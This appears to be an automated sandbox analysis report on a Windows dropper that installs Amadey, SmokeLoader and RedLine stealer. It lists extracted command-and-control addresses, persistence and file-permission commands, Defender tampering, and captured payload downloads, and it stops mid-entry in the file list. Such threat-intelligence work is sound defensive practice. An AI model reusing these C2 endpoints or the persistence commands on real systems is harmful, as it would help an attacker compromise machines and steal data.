Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    151s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/07/2023, 07:01 UTC

General

  • Target

    44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe

  • Size

    514KB

  • MD5

    359185cd139e6394a2c2dadee1076043

  • SHA1

    f7b24aff5b24c399611f10ab59708f81f4fe95ea

  • SHA256

    44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa

  • SHA512

    6438e2ba152a2f45e292207480e71c0ed53b8ffe82e5ca4d3a2d2a914358c37f826692d8134fc899135019ec47cc7d57e84650b33d1a86a9c5e612b864027d05

  • SSDEEP

    12288:dMr7y90QVj5N59ZZxOQgRWiEBhXAcB3HvPvME8NFXMq:+yp1fSQgRWim5N8N6q

Malware Config

Extracted

Family

amadey

Version

3.85

C2

77.91.68.3/home/love/index.php

Extracted

Family

smokeloader

Version

2022

C2

http://77.91.68.29/fks/

rc4.i32
1
0x4b3b02b6
rc4.i32
1
0x6ea683ed

Extracted

Family

redline

Botnet

grom

C2

77.91.68.68:19071

Attributes
  • auth_value

    9ec3129bff410b89097d656d7abc33dc

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 4 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe
    "C:\Users\Admin\AppData\Local\Temp\44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3348
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:5088
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5274918.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5274918.exe
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          • Executes dropped EXE
          • Windows security modification
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1824
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b1952586.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b1952586.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3784
          • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
            "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2812
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
              6⤵
              • Creates scheduled task(s)
              PID:880
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "Admin:N"&&CACLS "danke.exe" /P "Admin:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "Admin:N"&&CACLS "..\3ec1f323b5" /P "Admin:R" /E&&Exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4952
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                7⤵
                  PID:2184
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "danke.exe" /P "Admin:N"
                  7⤵
                    PID:756
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "danke.exe" /P "Admin:R" /E
                    7⤵
                      PID:2160
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      7⤵
                        PID:1848
                      • C:\Windows\SysWOW64\cacls.exe
                        CACLS "..\3ec1f323b5" /P "Admin:N"
                        7⤵
                          PID:2880
                        • C:\Windows\SysWOW64\cacls.exe
                          CACLS "..\3ec1f323b5" /P "Admin:R" /E
                          7⤵
                            PID:3412
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                          6⤵
                          • Loads dropped DLL
                          PID:3416
                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exe
                    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exe
                    3⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:4152
                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exe
                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exe
                  2⤵
                  • Executes dropped EXE
                  PID:60
              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
                C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
                1⤵
                • Executes dropped EXE
                PID:2468
              • C:\Users\Admin\AppData\Local\Temp\18DD.exe
                C:\Users\Admin\AppData\Local\Temp\18DD.exe
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:1836
                • C:\Windows\SysWOW64\control.exe
                  "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4180
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
                    3⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:3792
                    • C:\Windows\system32\RunDll32.exe
                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2776
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
                        5⤵
                        • Loads dropped DLL
                        PID:5088
              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
                C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
                1⤵
                • Executes dropped EXE
                PID:2956

              Network

              • flag-us
                DNS
                146.78.124.51.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                146.78.124.51.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                8.3.197.209.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                8.3.197.209.in-addr.arpa
                IN PTR
                Response
                8.3.197.209.in-addr.arpa
                IN PTR
                vip0x008map2sslhwcdnnet
              • flag-us
                DNS
                23.159.190.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                23.159.190.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                95.221.229.192.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                95.221.229.192.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                55.36.223.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                55.36.223.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                208.240.110.104.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                208.240.110.104.in-addr.arpa
                IN PTR
                Response
                208.240.110.104.in-addr.arpa
                IN PTR
                a104-110-240-208deploystaticakamaitechnologiescom
              • flag-fi
                POST
                http://77.91.68.3/home/love/index.php
                danke.exe
                Remote address:
                77.91.68.3:80
                Request
                POST /home/love/index.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: 77.91.68.3
                Content-Length: 89
                Cache-Control: no-cache
                Response
                HTTP/1.1 200 OK
                Date: Sat, 22 Jul 2023 07:02:21 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 6
                Content-Type: text/html; charset=UTF-8
              • flag-us
                DNS
                3.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                3.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                3.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                3.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                3.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                3.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://fpeumd.net/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 233
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Sat, 22 Jul 2023 07:02:41 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 7
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://pmfwrats.net/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 192
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Sat, 22 Jul 2023 07:02:41 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 43
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-us
                DNS
                29.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                29.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                29.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                29.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                29.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                29.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                88.156.103.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                88.156.103.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                59.128.231.4.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                59.128.231.4.in-addr.arpa
                IN PTR
                Response
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://sneqxkmhcg.net/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 248
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Sat, 22 Jul 2023 07:03:02 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 47
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-fi
                GET
                http://77.91.68.3/home/love/Plugins/cred64.dll
                danke.exe
                Remote address:
                77.91.68.3:80
                Request
                GET /home/love/Plugins/cred64.dll HTTP/1.1
                Host: 77.91.68.3
                Response
                HTTP/1.1 404 Not Found
                Date: Sat, 22 Jul 2023 07:03:11 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 272
                Content-Type: text/html; charset=iso-8859-1
              • flag-fi
                GET
                http://77.91.68.3/home/love/Plugins/clip64.dll
                danke.exe
                Remote address:
                77.91.68.3:80
                Request
                GET /home/love/Plugins/clip64.dll HTTP/1.1
                Host: 77.91.68.3
                Response
                HTTP/1.1 200 OK
                Date: Sat, 22 Jul 2023 07:03:11 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Last-Modified: Thu, 06 Jul 2023 18:47:56 GMT
                ETag: "16400-5ffd5f45b7dbc"
                Accept-Ranges: bytes
                Content-Length: 91136
                Content-Type: application/x-msdos-program
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://nihtya.org/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 238
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Sat, 22 Jul 2023 07:03:23 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 47
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-us
                DNS
                11.227.111.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                11.227.111.52.in-addr.arpa
                IN PTR
                Response
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://grdguk.com/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 197
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Sat, 22 Jul 2023 07:03:44 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 45
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://opilmtwth.net/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 337
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Sat, 22 Jul 2023 07:03:45 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 403
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-fi
                GET
                http://77.91.68.30/fuzz/raman.exe
                Remote address:
                77.91.68.30:80
                Request
                GET /fuzz/raman.exe HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Host: 77.91.68.30
                Response
                HTTP/1.1 200 OK
                Date: Sat, 22 Jul 2023 07:03:44 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Last-Modified: Sat, 22 Jul 2023 06:50:34 GMT
                ETag: "184e8e-6010dcc4c0280"
                Accept-Ranges: bytes
                Content-Length: 1592974
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/x-msdos-program
              • flag-us
                DNS
                30.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                30.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                30.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                30.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                30.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                30.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                27.178.89.13.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                27.178.89.13.in-addr.arpa
                IN PTR
                Response
              • 77.91.68.3:80
                http://77.91.68.3/home/love/index.php
                http
                danke.exe
                515 B
                365 B
                6
                5

                HTTP Request

                POST http://77.91.68.3/home/love/index.php

                HTTP Response

                200
              • 77.91.68.68:19071
                d8279993.exe
                260 B
                5
              • 77.91.68.29:80
                http://77.91.68.29/fks/
                http
                1.4kB
                842 B
                9
                9

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404
              • 77.91.124.31:80
                260 B
                5
              • 77.91.68.68:19071
                d8279993.exe
                260 B
                5
              • 77.91.68.29:80
                http://77.91.68.29/fks/
                http
                834 B
                510 B
                7
                6

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404
              • 77.91.124.31:80
                260 B
                5
              • 77.91.68.3:80
                http://77.91.68.3/home/love/Plugins/clip64.dll
                http
                danke.exe
                3.9kB
                94.8kB
                76
                74

                HTTP Request

                GET http://77.91.68.3/home/love/Plugins/cred64.dll

                HTTP Response

                404

                HTTP Request

                GET http://77.91.68.3/home/love/Plugins/clip64.dll

                HTTP Response

                200
              • 77.91.68.68:19071
                d8279993.exe
                260 B
                5
              • 77.91.68.29:80
                http://77.91.68.29/fks/
                http
                820 B
                510 B
                7
                6

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404
              • 77.91.124.31:80
                260 B
                5
              • 77.91.68.29:80
                http://77.91.68.29/fks/
                http
                1.5kB
                1.2kB
                10
                9

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404
              • 77.91.68.30:80
                http://77.91.68.30/fuzz/raman.exe
                http
                56.4kB
                1.6MB
                1090
                1176

                HTTP Request

                GET http://77.91.68.30/fuzz/raman.exe

                HTTP Response

                200
              • 77.91.68.68:19071
                d8279993.exe
                260 B
                5
              • 77.91.68.68:19071
                d8279993.exe
                260 B
                5
              • 8.8.8.8:53
                146.78.124.51.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                146.78.124.51.in-addr.arpa

              • 8.8.8.8:53
                8.3.197.209.in-addr.arpa
                dns
                70 B
                111 B
                1
                1

                DNS Request

                8.3.197.209.in-addr.arpa

              • 8.8.8.8:53
                23.159.190.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                23.159.190.20.in-addr.arpa

              • 8.8.8.8:53
                95.221.229.192.in-addr.arpa
                dns
                73 B
                144 B
                1
                1

                DNS Request

                95.221.229.192.in-addr.arpa

              • 8.8.8.8:53
                55.36.223.20.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                55.36.223.20.in-addr.arpa

              • 8.8.8.8:53
                208.240.110.104.in-addr.arpa
                dns
                74 B
                141 B
                1
                1

                DNS Request

                208.240.110.104.in-addr.arpa

              • 8.8.8.8:53
                3.68.91.77.in-addr.arpa
                dns
                207 B
                207 B
                3
                3

                DNS Request

                3.68.91.77.in-addr.arpa

                DNS Request

                3.68.91.77.in-addr.arpa

                DNS Request

                3.68.91.77.in-addr.arpa

              • 8.8.8.8:53
                29.68.91.77.in-addr.arpa
                dns
                210 B
                210 B
                3
                3

                DNS Request

                29.68.91.77.in-addr.arpa

                DNS Request

                29.68.91.77.in-addr.arpa

                DNS Request

                29.68.91.77.in-addr.arpa

              • 8.8.8.8:53
                88.156.103.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                88.156.103.20.in-addr.arpa

              • 8.8.8.8:53
                59.128.231.4.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                59.128.231.4.in-addr.arpa

              • 8.8.8.8:53
                11.227.111.52.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                11.227.111.52.in-addr.arpa

              • 8.8.8.8:53
                30.68.91.77.in-addr.arpa
                dns
                210 B
                210 B
                3
                3

                DNS Request

                30.68.91.77.in-addr.arpa

                DNS Request

                30.68.91.77.in-addr.arpa

                DNS Request

                30.68.91.77.in-addr.arpa

              • 8.8.8.8:53
                27.178.89.13.in-addr.arpa
                dns
                71 B
                145 B
                1
                1

                DNS Request

                27.178.89.13.in-addr.arpa

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\18DD.exe

                Filesize

                1.5MB

                MD5

                76fd6676743cf24b0f2011f4ca153f51

                SHA1

                d90dbad79132048524d3c6f4fafdc1dff1128070

                SHA256

                ae6b43b8b3a5c1e1f03671fb09015a59e3224dcf3f8b7aa84183407d4f111b92

                SHA512

                3d091278b1e359ebc8406b6422527768705a54ea7b7b0c1aacd31c9ecdcb24ba3bf0269e55dc72a666cce7ac5cc3ca4165d13c783f9bf871d223fccfa4025de5

              • C:\Users\Admin\AppData\Local\Temp\18DD.exe

                Filesize

                1.5MB

                MD5

                76fd6676743cf24b0f2011f4ca153f51

                SHA1

                d90dbad79132048524d3c6f4fafdc1dff1128070

                SHA256

                ae6b43b8b3a5c1e1f03671fb09015a59e3224dcf3f8b7aa84183407d4f111b92

                SHA512

                3d091278b1e359ebc8406b6422527768705a54ea7b7b0c1aacd31c9ecdcb24ba3bf0269e55dc72a666cce7ac5cc3ca4165d13c783f9bf871d223fccfa4025de5

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                228KB

                MD5

                be4091357bb914de71e288c65678a19c

                SHA1

                349f9335ac78528e05450ad5d83d890c98b2588e

                SHA256

                d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422

                SHA512

                106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                228KB

                MD5

                be4091357bb914de71e288c65678a19c

                SHA1

                349f9335ac78528e05450ad5d83d890c98b2588e

                SHA256

                d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422

                SHA512

                106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                228KB

                MD5

                be4091357bb914de71e288c65678a19c

                SHA1

                349f9335ac78528e05450ad5d83d890c98b2588e

                SHA256

                d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422

                SHA512

                106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                228KB

                MD5

                be4091357bb914de71e288c65678a19c

                SHA1

                349f9335ac78528e05450ad5d83d890c98b2588e

                SHA256

                d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422

                SHA512

                106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                228KB

                MD5

                be4091357bb914de71e288c65678a19c

                SHA1

                349f9335ac78528e05450ad5d83d890c98b2588e

                SHA256

                d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422

                SHA512

                106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444

              • C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl

                Filesize

                1.3MB

                MD5

                9f0cd2d6ab20bfe5e37bcf5e3f7d156e

                SHA1

                13dafab2c1f38b8e7ddeef055436f42ef175d384

                SHA256

                e1ab9f9baaf156a0f791c76e393621bb3af38d2483aadfab91345d4c0d4fa498

                SHA512

                bd1668d8938083dddd628f209f2f921439c723d7dbeaa8b9b094282cc1e809b34d8f0294c777a9718922f9ac6d86138327ae9fee56561848779d783e186e7df7

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exe

                Filesize

                173KB

                MD5

                cc911bee2e374dd2ee47ca2faf4f1b95

                SHA1

                ae956f838b9e251026e19c10b70aa4f9f6f51103

                SHA256

                f2c4ec8bf0ea81530b5bb84d00ed484652ab093e1cbb63b27b35cdd134e853ee

                SHA512

                7c89dbe8a9a835026854e95344763131c98acd987e443180f80b941d42f4e55a9f491c0dd35f8c1677d5d6e7b3caad5a5c3dda0d8713e8653dd1013021617226

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exe

                Filesize

                173KB

                MD5

                cc911bee2e374dd2ee47ca2faf4f1b95

                SHA1

                ae956f838b9e251026e19c10b70aa4f9f6f51103

                SHA256

                f2c4ec8bf0ea81530b5bb84d00ed484652ab093e1cbb63b27b35cdd134e853ee

                SHA512

                7c89dbe8a9a835026854e95344763131c98acd987e443180f80b941d42f4e55a9f491c0dd35f8c1677d5d6e7b3caad5a5c3dda0d8713e8653dd1013021617226

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exe

                Filesize

                359KB

                MD5

                f471bd967550727b5cdf9b7f0c8e3bbf

                SHA1

                87a64fa5523cf933a65268c01b7e42504cc44e86

                SHA256

                97de47c8eefec7dcd225130f2f6508a88304875bc83d6ef2b7ad072c562cf8fe

                SHA512

                e6934029eacbb50436d410ae512e1da1634e6ebd8b3b1f0ff42a8099d0ad3f702f730622fc2ea46316fcf474b1767452cf6dbbe4d659decb32ee065c943ff2e3

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exe

                Filesize

                359KB

                MD5

                f471bd967550727b5cdf9b7f0c8e3bbf

                SHA1

                87a64fa5523cf933a65268c01b7e42504cc44e86

                SHA256

                97de47c8eefec7dcd225130f2f6508a88304875bc83d6ef2b7ad072c562cf8fe

                SHA512

                e6934029eacbb50436d410ae512e1da1634e6ebd8b3b1f0ff42a8099d0ad3f702f730622fc2ea46316fcf474b1767452cf6dbbe4d659decb32ee065c943ff2e3

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exe

                Filesize

                33KB

                MD5

                41207187a052b1304acc8f89494f9bed

                SHA1

                8e912d6295c143dc42f9dd0388d00d0dc4717189

                SHA256

                b0a448370cbab4bf8414da1577f3790f39b442d8860948edf652100b033d3405

                SHA512

                52d36fac30714b815caf391191b4d1a8855e7f323c5b1455a01ce2636647f1da54c9d4c2fd6cb89be90781fa397963848791c4b6a2d76c2ad3624d767f17e597

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exe

                Filesize

                33KB

                MD5

                41207187a052b1304acc8f89494f9bed

                SHA1

                8e912d6295c143dc42f9dd0388d00d0dc4717189

                SHA256

                b0a448370cbab4bf8414da1577f3790f39b442d8860948edf652100b033d3405

                SHA512

                52d36fac30714b815caf391191b4d1a8855e7f323c5b1455a01ce2636647f1da54c9d4c2fd6cb89be90781fa397963848791c4b6a2d76c2ad3624d767f17e597

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exe

                Filesize

                235KB

                MD5

                f681aeef0068a3b7b72d1785015ed9c4

                SHA1

                3416fd75188c5670108e83294f06c3cf3f3f3fdb

                SHA256

                91f5e55b4cc956dad58e8ef6e88602aa70d20de01dbc8d5d023bf48968bd1d98

                SHA512

                2a7cb87ceffe5cec6dddc1f8debbdcf9a12d614a7b98131f431aa637c8eb1dd295f3fca0b857883263fe1fab473c57c5ddadbd364dd714525a0ab1277c2afb01

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exe

                Filesize

                235KB

                MD5

                f681aeef0068a3b7b72d1785015ed9c4

                SHA1

